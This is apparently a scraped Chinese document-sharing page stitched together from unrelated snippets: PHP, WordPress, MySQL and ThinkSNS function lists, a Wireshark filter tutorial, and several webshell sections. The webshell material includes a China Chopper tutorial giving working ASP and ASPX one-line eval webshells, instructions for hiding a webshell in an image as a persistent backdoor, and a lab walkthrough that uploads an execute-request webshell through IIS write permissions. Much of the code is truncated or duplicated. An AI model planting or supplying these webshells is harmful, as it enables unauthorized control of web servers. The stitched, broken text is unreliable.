php eval函数一句话木马代码

完整的WordPress函数大全

完整的WordPress函数大全 在修改和制作Wordpress主题时经常为不知道内置函数而苦恼，而wordpress官方的文档看起来又不是那么方便。所搜集并且整理了一下放这，以备后用。 判断页面函数 is_home() : 是否为主页 is_single() : 是否为内容页(P ost) is_page() : 是否为内容页(Page) is_category() : 是否为Category/Archive页 is_tag() : 是否为Tag存档页 is_date() : 是否为指定日期存档页 is_year() : 是否为指定年份存档页 is_month() : 是否为指定月份存档页 is_day() : 是否为指定日存档页 is_time() : 是否为指定时间存档页 is_archive() : 是否为存档页 is_search() : 是否为搜索结果页

is_404() : 是否为“HTTP 404: Not Found”错误页 is_paged() : 主页/Category/Archive页是否以多页显示 Header部分常用到的PHP函数 : 博客名称(Title) : CSS文件路径 : PingBack Url : 模板文件路径 : WordPress版本 : Atom Url : RSS 2.o Url : 博客Url : 博客网页Html类型 : 博客网页编码 : 博客描述

PHP简答题大题(含答案)

重要知识点： 1、变量赋值方式有哪几种？ 1）直接赋值 $str = 123; 2）变量间赋值 $arr = array(); $arr[] = 123; $arr[] = 456; $a; $a = 123; 3）引用赋值 $a = 123; $b = $a; 2、引用和拷贝有什么区别？ 拷贝是将原来的变量内容复制下来，拷贝后的变量与原来的变量使用各自的内存，互不干扰。 引用相当于是变量的别名，其实就是用不同的名字访问同一个变量内容。当改变其中一个变量的值时，另一个也跟着发生变化。 3、 php中变量有哪些基本数据类型？ php支持8种原始数据类型。 包括： 四种标量类型（布尔型boolean，整型interger，浮点型float/double , 字符串string）两种复合类型(数组array ，对象object) 两种特殊类型（资源resource，NULL） 4、其它类型转换为boolean类型时，哪些被认为是false？ 布尔值false，整型值0，浮点型值0.0，空白字符串，字符串'0', 空数组， 空对象，特殊数据类型NULL, 没有设定的变量。 empty()函数在哪些情况下返回true？ 布尔值false，整型值0，浮点型值0.0，空白字符串，字符串'0', array()空数组，特殊数据类型NULL, 没有任何属性的对象，没有赋值的变量。 5、常量和变量有哪些区别？ 1）常量前没有$符号； 2）常量只能通过define()定义，而不能通过赋值语句定义； 3）常量可以在任何地方定义和访问，而变量定义的反问有固定的规则； 4）常量一旦定义就不能被重新定义或者取消定义，而变量而通过赋值方式重新定义； 5）常量的值只能是标量数据，而变量的数据库类型有8中原始数据类型。 6、函数的优越性有哪些？ 提高程序的可维护性 提高软件的可靠性 提高程序的可重用性 提高程序的开发效率

常用函数 类参考

全局函数1、common.func.php 公用函数 获得当前的脚本网址 function GetCurUrl() 返回格林威治标准时间 function MyDate($format='Y-m-d H:i:s',$timest=0) 把全角数字转为半角 function GetAlabNum($fnum) 把含HTML的内容转为纯text function Html2Text($str,$r=0) 把文本转HTML function Text2Html($txt) 输出Ajax头 function AjaxHead() 中文截取2，单字节截取模式 function cn_substr($str,$slen,$startdd=0) 把标准时间转为Unix时间戳 function GetMkTime($dtime) 获得一个0000-00-00 00:00:00 标准格式的时间 function GetDateTimeMk($mktime) 获得一个0000-00-00 标准格式的日期 function GetDateMk($mktime) 获得用户IP function GetIP() 获取拼音以gbk编码为准 function GetPinyin($str,$ishead=0,$isclose=1)

dedecms通用消息提示框 function ShowMsg($msg,$gourl,$onlymsg=0,$limittime=0) 保存一个cookie function PutCookie($key,$value,$kptime=0,$pa="/") 删除一个cookie function DropCookie($key) 获取cookie function GetCookie($key) 获取验证码 function GetCkVdValue() 过滤前台用户输入的文本内容 // $rptype = 0 表示仅替换html标记 // $rptype = 1 表示替换html标记同时去除连续空白字符// $rptype = 2 表示替换html标记同时去除所有空白字符// $rptype = -1 表示仅替换html危险的标记 function HtmlReplace($str,$rptype=0) 获得某文档的所有tag function GetTags($aid) 过滤用于搜索的字符串 function FilterSearch($keyword) 处理禁用HTML但允许换行的内容 function TrimMsg($msg) 获取单篇文档信息 function GetOneArchive($aid)

中国菜刀使用教程

想学学怎么用菜刀，刚在网上搜到了菜刀的使用方法。怕有和我一样的新手不会用，所以发过来，算是给大家分享吧。首先说一下菜刀的功能，菜刀是用来连一句话的，asp、aspx、php的一句话菜刀都可以连，只是这几种一句话语句不一样。 asp的一句话是：<%eval request("pass")%> aspx的一句话是：<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> php的一句话是： 这几个一句话的密码都是pass，也就是双引号或者单引号包含着的这部分，比如我想把asp 的一句话的密码改成wc，那么改完之后就是这样的： <%eval request("wc")%> 其他同理。 要想连一句话，你首先得把这个一句话插入到一个正常的网站文件中，asp的一句话插入到asp文件里，aspx的一句话插入到aspx文件里，php同理。 当然，你也可以把一句话单独写在一个文件里，比如你新建了一个asp文件，这个asp文件的全部内容就只有一个一句话，也是可以的。 插入了一句话木马，下面就是连接了。 在菜刀主界面，右击，选择“添加”， 在“地址”这里填上你插入一句话的文件的地址，后边的那个小框填的是你的一句话的密码，其他的不用填， 填完之后单击“添加”，就可以了。 添加完毕后，你的这个一句话的shell会显示到主界面里，右击它，选择“文件管理”，就可以看到网站上的文件了 在菜刀里还有一个功能，是“虚拟终端”，也是在右键菜单里的，这个相当于webshell中的执行DOS命令的功能 如果你的shell有权执行DOS命令，那么直接输入命令回车就可以看到结果了如果你的shell有权执行DOS命令，那么直接输入命令回车就可以看到结果了

一句话木马图片制作(三种方法)

图片木马制作的三种方法Copy命令制作 1.asp内容： 打开cmd，数据一下命令：

此时打开两个jpg文件，相比： 且打开可以像一样显示图像。 把以下代码放入目标网站，即可按asp执行。<% #include files=””%> Uedit32（转载）：

本制作来自于：雪糕。 我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误： Microsoft VBScript 运行时错误错误 '800a000d' 类型不匹配: 'execute' /news1/，行 3 所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码： 这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。 制作步骤： 一、前期准备 材料： 1.一张图片：

2.一句话木马服务器端代码： <%execute request("value")%>（其他的一句话也行） 3.一句Script标签： 4. 调用图片后门代码： 工具：UltraEdit

MySQL常用函数

一、数学函数 ABS(x) 返回x的绝对值 BIN(x) 返回x的二进制（OCT返回八进制，HEX返回十六进制） CEILING(x) 返回大于x的最小整数值 EXP(x) 返回值e（自然对数的底）的x次方 FLOOR(x) 返回小于x的最大整数值 GREATEST(x1,x2,...,xn)返回集合中最大的值 LEAST(x1,x2,...,xn) 返回集合中最小的值 LN(x) 返回x的自然对数 LOG(x,y)返回x的以y为底的对数 MOD(x,y) 返回x/y的模（余数） PI()返回pi的值（圆周率） RAND()返回０到１内的随机值,可以通过提供一个参数(种子)使RAND()随机数生成器生成一个指定的值。 ROUND(x,y)返回参数x的四舍五入的有y位小数的值 SIGN(x) 返回代表数字x的符号的值 SQRT(x) 返回一个数的平方根 TRUNCATE(x,y) 返回数字x截短为y位小数的结果 二、聚合函数(常用于GROUP BY从句的SELECT查询中) AVG(col)返回指定列的平均值 COUNT(col)返回指定列中非NULL值的个数 MIN(col)返回指定列的最小值 MAX(col)返回指定列的最大值 SUM(col)返回指定列的所有值之和 GROUP_CONCAT(col) 返回由属于一组的列值连接组合而成的结果 三、字符串函数 ASCII(char)返回字符的ASCII码值 BIT_LENGTH(str)返回字符串的比特长度 CONCAT(s1,s2...,sn)将s1,s2...,sn连接成字符串 CONCAT_WS(sep,s1,s2...,sn)将s1,s2...,sn连接成字符串，并用sep字符间隔 INSERT(str,x,y,instr) 将字符串str从第x位置开始，y个字符长的子串替换为字符串instr，返回结果 FIND_IN_SET(str,list)分析逗号分隔的list列表，如果发现str，返回str在list中的位置LCASE(str)或LOWER(str) 返回将字符串str中所有字符改变为小写后的结果 LEFT(str,x)返回字符串str中最左边的x个字符 LENGTH(s)返回字符串str中的字符数

01-Wireshark教程和3个实例

Wireshark教程 一、界面 二、认识数据包 网络的7层次结构：物理层、数据链路层、网络层、传输层、表示层、会话层、应用层物理层数据帧概况： 数据链路层以太网帧头部信息 MAC地址：是网卡的物理地址 前3组是表示生产厂家、后3组是厂家对网卡的编号 IP地址是我们定义的，可以随便更改 ARP协议就是用来对二者进行转换的

互联网层IP包头部信息 其它内容 三、过滤器设置 过滤器的区别 捕捉过滤器（CaptureFilters）：用于决定将什么样的信息记录在捕捉结果中。需要在开始捕捉前设置。显示过滤器（DisplayFilters）：在捕捉结果中进行详细查找。他们可以在得到捕捉结果后随意修改。 那么我应该使用哪一种过滤器呢？ 两种过滤器的目的是不同的。

捕捉过滤器是数据经过的第一层过滤器，它用于控制捕捉数据的数量，以避免产生过大的日志文件。 显示过滤器是一种更为强大（复杂）的过滤器。它允许您在日志文件中迅速准确地找到所需要的记录。 两种过滤器使用的语法是完全不同的。 显示过滤器 snmp || dns || icmp//显示SNMP或DNS或ICMP封包。 ip.addr == 10.1.1.1//显示来源或目的IP地址为10.1.1.1的封包。 ip.src==172.16.1.102 //显示来源是172.16.1.102的数据包 ip.src != 10.1.2.3 or ip.dst != 10.4.5.6//显示来源不为10.1.2.3或者目的不为10.4.5.6的封包。 ip.src != 10.1.2.3 and ip.dst != 10.4.5.6 //显示来源不为10.1.2.3并且目的IP不为10.4.5.6的封包。 tcp.port == 25//显示来源或目的TCP端口号为25的封包。 tcp.dstport == 25//显示目的TCP端口号为25的封包。 tcp.flags//显示包含TCP标志的封包。 tcp.flags.syn == 0x02//显示包含TCP SYN标志的封包。 可以从上面看过滤器设置的规则 通过这里的背景可以判断使用的语法是否正确：红色背景表示语法错误，绿色背景表示正确并且可以运行，黄色背景表示语法正确，但是可能没有结果。 1、使用字段名来过滤 在过滤器中输入：http.request.method==”GET” ，将显示使用GET方法获取数据的所有包

THINKSNS常用函数

Thinksns常用函数一览表： 以下是extend.php： *function get_client_ip(){}获取客户端IP地址 *function msubstr($str,$start=0,$length,$charset="utf-8",$suffix=true)字符串截取，支持中文和其它编码 *function mStr($str,$length,$charset="utf-8",$suffix=true)字符串截取，支持中文和其它编码 *function rand_string($len=6,$type='',$addChars='')产生随机字串，可用来自动生成密码默认长度6位字母和数字混合 *function build_verify($length=4,$mode=1)获取登录验证码默认为4位数字 *function byte_format($size,$dec=2)字节格式化把字节数格式为B K M G T描述的大小 *function is_utf8($string)检查字符串是否是UTF8编码 *function highlight_code($str,$show=false)代码加亮 *function h($text,$type,$tagsMethod=true,$attrMethod=true,$xssAuto= 1,$tags=array(),$attr=array(),$tagsBlack=array(),$attrBlack=array())过滤得到安全的html //function h($text,$tags=null)输出安全的html //function text($text,$parseBr=false)输出纯文本 function safe($text,$type='html',$tagsMethod=true,$attrMethod=true,$xssAuto= 1,$tags=array(),$attr=array(),$tagsBlack=array(),$attrBlack=array()) *function t($text,$parse_br=false,$quote_style=ENT_NOQUOTES)转换为安全的纯文本 //function unescape($str)解析jsescape //function ubb($Text)解析UBB //function build_count_rand($number,$length=4,$mode=1)随机生成一组字符串 function remove_xss($val) *function list_to_tree($list,$pk='id',$pid='pid',$child='_child',$root=0) *function list_sort_by($list,$field,$sortby='asc')对查询结果集进行排序 *function list_search($list,$condition)在数据列表中搜索 //function send_http_status($status)发送Http状态信息 //function send_http_header($type='utf8')发送常用http header信息 //function imagecreatefrombmp($fname)bmp图像处理兼容函数 //function imagebmp(&$im,$filename='',$bit=8,$compression=0)bmp图像处理兼容函数 *function friendlyDate($sTime,$type='normal',$alt='false')友好的时间显示 *function dateFormat($sTime,$format=null)时间显示 //function getMid()获取当前登录用户的UID //function getUserName($uid,$lang='zh')获取用户姓名 *function getUserAtString($uid,$type='uid')获取用户Gid[Mentor项目] //function getUserSpace($uid,$class,$target,$text,$icon=true)返回解析的空间地址 //function getUserInfo($uid,$uname,$mid,$status=false)获取用户详细信息 *function getFollowState($uid,$fid,$type=0)获取关注状态 *function isfavorited($weibo_id,$uid,$weibo_id_array=null,$key='')检查给定用户是否收藏给定微博 *function isBlackList($uid,$fid)是否为黑名单成员 *function getUserFace($uid,$size)获取用户头像 function getUserFace($uid,$size) //function convertUidToPath($uid)将用户ID转换为三级路径 //function getUserGroupIcon($uid)获取给定用户的用户组图标 function getSubBeKeyArray($origin,$key) *function getSubByKey($pArray,$pKey="",$pCondition="")去一个二维数组中的每个数组的固定的键知道的值来形成一个新的一维数组

20个常用的PHP源代码收集

20个常用的PHP源代码收集 1. PHP可阅读随机字符串 此代码将创建一个可阅读的字符串，使其更接近词典中的单词，实用且具有密码验证功能。 /************** *@length - length of random string (must be a multiple of 2) **************/ function readable_random_string($length = 6){ $conso=array("b","c","d","f","g","h","j","k","l", "m","n","p","r","s","t","v","w","x","y","z"); $vocal=array("a","e","i","o","u"); $password=""; srand ((double)microtime()*1000000); $max = $length/2; for($i=1; $i<=$max; $i++) { $password.=$conso[rand(0,19)]; $password.=$vocal[rand(0,4)]; } return $password; } 2. PHP生成一个随机字符串 如果不需要可阅读的字符串，使用此函数替代，即可创建一个随机字符串，作为用户的随机密码等。 /************* *@l - length of random string */ function generate_rand($l){ $c= "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; srand((double)microtime()*1000000); for($i=0; $i<$l; $i++) { $rand.= $c[rand()%strlen($c)]; } return $rand; } 3. PHP编码电子邮件地址

PHP函数

函数 计算机编程之所以存在，就是为了自动完成各种任务，从按揭还贷计算到确定一个人每天最佳的卡路里摄入量，这些任务可谓林林总总，形式各异。不过，随着这些任务变得越来越复杂，你会发现它们往往由另外一些重复的任务组成。例如，在电子商务应用中，可能需要在多个不同页面上验证一个E-mail地址，如新用户注册来使用一个网站时，有人希望增加一条产品评论时，或者一个访问者订阅一份刊物时，此时都需要验证E-mail地址。用来验证E-mail地址的正则表达式相当复杂，因此最好在一个地方维护，而不要把它嵌入到多个不同的页面中，特别地，如果需要针对一个新的域(如.museum)修改正则表达式，这一点更显重要。 令人欣慰的是，在现代计算机语言中，有这样一个概念很早就成为了其重要组成部分之一，即将这些重复的过程嵌入在一个命名的代码块中，然后在必要时调用这个代码块。这些代码块称为函数(function)，如果将来要修改嵌入的过程，这就提供了一个方便的修改点，而且只需在这一处做修改，因此可以大大地减少出现编程错误的可能性，还能降低维护的开销。 调用函数 标准的PHP发行包中有1000多个标准函数。假设函数库已经编译到安装发行包中，或者通过include()或require()语句包含了相应函数库，使得函数可用，那么通过指定函数名就可以调用函数。例如，假设希望计算5的3次方，可以如下调用PHP的pow()函数: 创建函数 对于力图避免在编程中闭门造车、一切都重新发明的程序员来说，虽然PHP的众多函数库是一笔巨大的财富，但迟早都会用到标准包以外的函数，这意味着你需要创建定制函数，甚至创建整个函数库。例如，考虑下面的函数generate footer()，它将输出一个页脚: 定义之后，就可以像下面这样调用这个函数:

PHP基础教程

什么是 PHP？ ？ PHP 指 PHP:超文本预处理器（译者注：PHP: Hypertext Preprocessor，递归命名） PHP 是一种服务器端的脚本语言，类似 ASP PHP 脚本在服务器上执行 PHP 支持很多数据库 （MySQL、 Informix、 Oracle、 Sybase、 Solid、 PostgreSQL、 Generic ODBC 等等） PHP 是一个开源的软件（open source software，OSS） PHP 可免费下载使用 什么是 MySQL？ ？ MySQL 是一种数据库服务器 MySQL 支持标准的 SQL MySQL 可在许多平台上编译 MySQL 可免费下载使用 为什么要使用 PHP PHP PHP PHP PHP？ ？ 可在不同的平台上运行（Windows、Linux、Unix） 与目前几乎所有的正在被使用的服务器相兼容（Apache、IIS 等） 可从官方的 PHP 资源免费下载：https://www.360docs.net/doc/491204886.html, 易于学习，并可高效地运行在服务器端
从何处开始？ 从何处开始？ 在 Windows 或者 Linux 机器上安装 Apache 服务器 在 Windows 或者 Linux 机器上安装 PHP 在 Windows 或者 Linux 机器上安装 MySQL 什么是 PHP PHP PHP PHP 文件？ 文件？ 文件可包含文本、HTML 标签以及脚本 文件向浏览器返回纯粹的 HTML 文件的文件后缀是 ".php"、".php3" 或 ".phtml"
下面的链接提供了来自 https://www.360docs.net/doc/491204886.html, 的优秀教程，您可以从中学习到如何安装 PHP5： https://www.360docs.net/doc/491204886.html,/manual/en/install.php 下载 PHP 从此处下载免费的 PHP：https://www.360docs.net/doc/491204886.html,/downloads.php
下载 MySQL Database 从此处下载免费的 MySQL：https://www.360docs.net/doc/491204886.html,/downloads/index.html 下载 Apache Server 从此处下载免费的 Apache：https://www.360docs.net/doc/491204886.html,/download.cgi 文件的输出 您无法在浏览器中通过查看源文档的方式来查看 PHP 的源代码 - 您只能看到 PHP 文件的输出，即纯粹 的 HTML。这是因为在结果返回浏览器之前，脚本就已经在服务器执行了。 。这是因为在结果返回浏览器之前，脚本就已经在服务器执行了。
基本的 PHP 语法
PHP 的脚本块以 结束。您可以把 PHP 的脚本块放置在文档中的任何位置。 当然，在支持简写的服务器上，您可以使用 来开始和结束脚本块。 不过，为了达到最好的兼容性，我们推荐您使用标准形式 ( PHP 文件通常会包含 HTML 标签，就像一个 HTML 文件，以及一些 PHP 脚本代码。 在下面，我们提供了一段简单的 PHP 脚本，它可以向浏览器输出文本 "Hello World"：

php常用数组函数整理

'windows','server'=>'apache','language'=>'PHP'); // foreach ($arr as $key => $value) { // echo $key.":".$value."
"; //循环输出多维数组 // $arr=array( // '公关部'=>array( // array('包子','经理','1500'), // array('佳佳','职员','0') // ), // '广告部'=>array( // array('包子','经理','1500'), // array('佳佳','职员','0') // ), // '设计部'=>array( // array('包子','经理','1500'), // array('佳佳','职员','0') // ) // ); // foreach ($arr as $key => $value) { // echo "

// // // "; // foreach ($value as $key => $value) { // echo ""; // foreach ($value as $key => $value) { // echo ""; // } // echo ""; // } // echo "

".$key."的10月工资

姓名	职务	工资
".$value."

"; // } // each函数list函数 // $arr=array('1','2','3','4','5','6'); // $arr2=array('1'=>'包子','2'=>'2B','3'=>'逗比','4'=>'包子佳佳','5'=>'佳佳包子','6'=>'佳佳'); // $arr2=each($arr); // print_r($arr2); // list($key,$value)=$arr2; // echo $key.":".$value;

6---PHP数组函数

（1）数组的概念与分类 定义：数组是php中最重要的数据类型之一，在php中的应用非常的广泛。因为php 是弱类型的编程语言，所以php中的数组变量可以存储任意多个、任意类型的数据。使用数组的目的，就是将多个相互关联的数据组织到一起，形成一个集合，作为一个单元使用达到批量数据处理的目的。 Php中数组的根据索引来分为关联数组和数字索引数组。如果一个数组中的索引全部为数字，那么数组就称为数字索引数组。如果数组中有一个索引为字符串那么数组就称为关联数组。 （2）Php中数组的定义 A.定义方式 （1）使用array（）声明 可以用array()语言结构来新建一个数组。它接受任意数量用逗号分隔的键(key) => 值(value) 对，例如： "bar", 12 => true); echo $arr["foo"]; // bar echo $arr[12]; // 1 ?> 其中键可以为整型或字符串型，值可以为任何类型。如果对给出的值 没有指定键名，则取当前最大的整数索引值，而新的键名将是该值加 一。如果指定的键名已经有了值，则该值会被覆盖。 （2）使用[]声明 我们可以使用[]来定义和修改数组元素 B.对数组元素的操作 （1）追加数组元素（就是在数组的末尾添加数组元素） $数组名[键名]=值； （2）更新数组元素 $数组名[键名]=新值； （3）删除数组元素 Unset($数组名[键名]) （4）在数组头部添加数组元素 Array_unshift($arr, $value)，在数组的开头插入一个元素。 （5）在数组的尾部添加数组元素 Array_push($arr, $value1, $value2..),将一个或多个元素压入数组栈的末尾（入栈），返回入栈元素个数。

题目11：IIS write漏洞利用

关卡十一 题目：IIS Write漏洞利用 关卡描述： IIS写权限对网站系统的安全是致命的，拥有写权限可以直接往网站目录写文件，在拥有写权限的服务器上，其安全相对设置薄弱，因此比较容易被入侵者控制。写权限漏洞严格意义上讲其实不算是漏洞，因为网站内容始终是要进行编辑和修改的。只有对文件的权限分配不慎才会造成写权限被利用，进而被植入木马等情况的发生。 建议： 1、如果是纯静态页网站，请不要添加写入与删除功能，那么你的空间就是百毒不侵。 2、如果有写入权限，无修改与删除功能，那么你的网站也是非常安全的，就算有入侵它所有写入的文件都不能更改（留下足迹）而你网站本身的文件也是相当安全。唯一的是可能会写入很多垃圾文件。 3、如果有修改权限，那么与有删除权限其实是一样的。因为一个文件就算删除不了，我把内容清空那与删除这个文件是一样的效果。所以分配这些权限需要小心谨慎。 答案提交： 1、请提交获取的KEY值。 参考步骤：

1.进入关卡十一： 2.获取目标主机ip地址 3.打开工具场景windows xp

4.C：\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描 5.目标系统中搭建网站存在该漏洞，鼠标右击会看到浏览、上传、导出等选项 6.选择put file测试一下，默认有该软件作者写的一个alert.txt文件，点击put，提示上传成功.如图：

打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件，且内容和软件里的一致 但是直接通过该软件写个asp木马上传是不行的。

使用iiswrite.exe上传内容为<%execute (request("lele"))%> 的文本文件## <%eval request(“a”)%> 在桌面先新建一个aa.txt文档,内容如下 然后通过使用iiswrite.exe上传文本文件。

mysql常用函数汇总

mysql常用函数汇总(分享) 一、数学函数 ABS(x) 返回x的绝对值 BIN(x) 返回x的二进制（OCT返回八进制，HEX返回十六进制） CEILING(x) 返回大于x的最小整数值 EXP(x) 返回值e（自然对数的底）的x次方 FLOOR(x) 返回小于x的最大整数值 GREATEST(x1,x2,...,xn)返回集合中最大的值 LEAST(x1,x2,...,xn) 返回集合中最小的值 LN(x) 返回x的自然对数 LOG(x,y)返回x的以y为底的对数 MOD(x,y) 返回x/y的模（余数） PI()返回pi的值（圆周率） RAND()返回０到１内的随机值,可以通过提供一个参数(种子)使RAND()随机数生成器生成一个指定的值。 ROUND(x,y)返回参数x的四舍五入的有y位小数的值 SIGN(x) 返回代表数字x的符号的值 SQRT(x) 返回一个数的平方根 TRUNCATE(x,y) 返回数字x截短为y位小数的结果 二、聚合函数(常用于GROUP BY从句的SELECT查询中) AVG(col)返回指定列的平均值 COUNT(col)返回指定列中非NULL值的个数 MIN(col)返回指定列的最小值 MAX(col)返回指定列的最大值

SUM(col)返回指定列的所有值之和 GROUP_CONCAT(col) 返回由属于一组的列值连接组合而成的结果 三、字符串函数 ASCII(char)返回字符的ASCII码值 BIT_LENGTH(str)返回字符串的比特长度 CONCAT(s1,s2...,sn)将s1,s2...,sn连接成字符串 CONCAT_WS(sep,s1,s2...,sn)将s1,s2...,sn连接成字符串，并用sep字符间隔 INSERT(str,x,y,instr) 将字符串str从第x位置开始，y个字符长的子串替换为字符串instr，返回结果 FIND_IN_SET(str,list)分析逗号分隔的list列表，如果发现str，返回str在list中的位置LCASE(str)或LOWER(str) 返回将字符串str中所有字符改变为小写后的结果 LEFT(str,x)返回字符串str中最左边的x个字符 LENGTH(s)返回字符串str中的字符数 LTRIM(str) 从字符串str中切掉开头的空格 POSITION(substr,str) 返回子串substr在字符串str中第一次出现的位置 QUOTE(str) 用反斜杠转义str中的单引号 REPEAT(str,srchstr,rplcstr)返回字符串str重复x次的结果 REVERSE(str) 返回颠倒字符串str的结果 RIGHT(str,x) 返回字符串str中最右边的x个字符 RTRIM(str) 返回字符串str尾部的空格 STRCMP(s1,s2)比较字符串s1和s2 TRIM(str)去除字符串首部和尾部的所有空格 UCASE(str)或UPPER(str) 返回将字符串str中所有字符转变为大写后的结果 四、日期和时间函数 CURDATE()或CURRENT_DATE() 返回当前的日期 CURTIME()或CURRENT_TIME() 返回当前的时间

PHP学习流程从零开始的一个总的流程

PHP学习流程-从零开始的一个总的流程 您能否成功，还得靠自己的，坚持，坚持，再坚持，就是步入成功的不二法门。 我先把我自己学习PHP的过程做一下概括： (1)熟悉HTML/CSS/JS等网页基本元素，完成阶段可自行制作完整的网页，对元素属性达到熟悉程度 (2)理解动态语言的概念，运做机制，熟悉PHP语法 (3)学习如何将PHP与HTML结合起来完成简单动态页面 (4)接触MYSQL，开始设计数据库程序 这个需要很多自己亲自敲的代码！ (5)不断巩固，摸透大部分PHP常用函数，并可理解OOP，MYSQL优化，以及模板 (6)完成一个功能齐全的动态站点 这套线路可能跟许多学习PHP的爱好者不谋而合，这也算是一个循序渐进的学习过程，不过新手不要看到上面的概括就以为学习蛮简单的，任何东西其实都不简单，即使是小吃部的烧饼也不是一下子就会做成的。 我先解释一下我的学习思路。 首先，理解网站这一概念之后不难看出，任何网站都是由网页组成的，也就是说想完成网站，必须先学会做网页，因此必须要掌握了HTML，才能为今后制作网站打下基础。 在学习HTML中我想边学边做是最有效的方式，当然这一方式对于学习PHP同样是最有效的。 HTML中的任何元素都要亲自实践，只有明白了什么元素会起到什么效果之后，你才会记忆深刻，而一味的啃书，绝对是不行的。 掌握静态网页的制作技术是学习开发网站的先决条件。 我假设你目前已经可以完成一个静态页面了。那么咱们就开始学习动态语言的概念吧，刚一接触动态语言，可能很多人都会蒙了，怎么这乱七八糟的东西，在网页里显示的时候却是另外一码事?其实这并不算乱七八糟，你写的HTML代码不也一样是一堆堆的字符吗?毕竟，代码并不是作为直接输出的，而是经过处理的，说白了，HTML是经过HTML解析器，而PHP当然也就通过PHP解析器了，跟学习HTML一样的道理，想让任何的解析器完成操作，就必须使用它们专用的语法结构，所以PHP长相奇怪也就不足为奇了。 对于PHP的理解是新手最难迈过的一道门槛，不过你应该感到幸运的是PHP已经最大极限的为了新手而努力了，如果你学过其他的语言，也许会觉得PHP的确相当的简单，即使你理解不了PHP，但是也必须先跟它混个脸熟。 搞清楚HTML和PHP的概念，那么PHP和HTML混合编程应该不成问题，在这期间，你完全可以让PHP给你算算一加一等于几，然后在浏览器输出，不要觉得幼稚，这的确是跟阿波罗登月一样，你打的是一小段代码，但是对于你的编程之路，可是迈出了一大步啊!兴奋吧?但是不得不再给你泼点冷水，您还是菜鸟一个。 高兴一段时间就必须继续努力了，接下来就是学习数据库了，MYSQL可算是PHP的黄金搭档了，不过，虽然话是这么说，你也可能恨不得把MYSQL给生吞活剥了，因为这一行一列的东东简直让自己头晕目眩。 头晕归头晕，目眩归目眩，你不可能吃饭的时候咬了自己一下舌头就从此不吃饭了不是?放下畏惧，继续努力，咱们是来征服它的，而不是被它征服的，振奋起来吧同志。 在一番搏斗之后，你终于理解了数据库的概念，而且让你兴奋不已的是你终于可以通过

Phpexcel常用函数

//引入文件 require_once(dirname(__FILE__) . 'PHPExcel.php'); 实例化对象 $objPHPExcel = new PHPExcel(); // 操作第一个工作表 $objPHPExcel->setActiveSheetIndex(0); //设置默认行高 $objPHPExcel->getActiveSheet()->getDefaultRowDimension()->setRowHeight(30); //所有单元格（列）默认宽度 $objPHPExcel->getActiveSheet()->getDefaultColumnDimension()->setWidth(2 0); 设置默认的字体和文字大小 $objPHPExcel->getDefaultStyle()->getFont()->setName( 'Arial'); $objPHPExcel->getDefaultStyle()->getFont()->setSize(20); //***********************画出单元格边框***************************** $styleArray = array( 'borders' => array( 'allborders' => array( //'style' => PHPExcel_Style_Border::BORDER_THICK,//边框是粗的 'style' => PHPExcel_Style_Border::BORDER_THIN,//细边框 //'color' => array('argb' => 'FFFF0000'), ), ), ); $objWorksheet->getStyle('A5:N5)->applyFromArray($styleArray);//这里就是画出从单元格A5到N5的边框 //******************画出单元格边框结束*************************** 设置列的宽度 $objActSheet->getColumnDimension( 'B')->setAutoSize(true); //内容自适应 $objActSheet->getColumnDimension( 'A')->setWidth(30); //30宽